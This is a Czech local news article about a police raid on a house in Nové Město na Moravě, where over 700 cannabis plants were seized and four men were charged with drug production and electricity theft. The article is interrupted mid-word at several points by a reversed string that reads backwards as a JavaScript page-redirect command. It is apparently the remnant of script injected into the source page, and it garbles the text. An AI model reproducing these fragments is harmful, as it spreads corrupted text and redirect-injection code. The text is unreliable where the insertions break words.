Rainbow page separator

V domě zajistili kriminalisté přes sedm set rostlin konopí

Neděle, 31. ledna 2016

Pěstírna konopí v Novém Městě na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Pěstírnu konopí v rodinném domě v Masarykově ulici v Novém Městě se podařilo odhalit žďárským kriminalistům. Při nočním zásahu policisté ve spolupráci s jednotkou na ochranu jaderné elektrárny Dukovany zadrželi čtyři podezřelé osoby, které se na pěs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování nelegálních rostlin podílely.
„Jedna osoba byla zadržena přímo v domě, další tři pak nedaleko místa v mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torovém vozidle. Při domovní prohlídce jsme zjistili, že v domě se nachází rozsáhlá pěstírna, a zajistili jsme více než sedm set rostlin konopí o průměrné výšce kolem 60 centimetrů,“ uvedl Karel Marek, zástupce vedoucího žďárských kriminalistů.
Ze zadržených mužů jsou dva Češi z Prahy a okolí a dva Vietnamci, z nichž jeden je ve věku do 18 let. Policisté je po zadržení umístili do cel a vyšetřovatel zahájil jejich trestní stíhání. Muži jsou obviněni z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, že nejméně od října loňského roku v domě pěs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali konopí v úmyslu získat návykovou látku marihuanu, a tu dále za úplatu poskytnout dalším lidem. „Navíc po uvedenou dobu neoprávněně odebírali elektrickou energii, kterou potřebovali na provoz elektrospotřebičů potřebných k efektivnímu pěs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování rostlin. Energetické společnosti způsobili škodu přes 150 tisíc korun,“ dodal Marek. Muži jsou stíháni pro zločin nedovolené výroby a jiné nakládání s omamnými a psychotropními látkami a jedy a přečin krádeže. „V případě prokázání viny jim hrozí trest odnětí svobody v rozmezí od dvou do deseti let. Veškeré okolnosti případu kriminalisté dále vyšetřují a není vyloučeno, že budou obviněny další osoby,“ dodala policejní mluvčí Monika Pátková.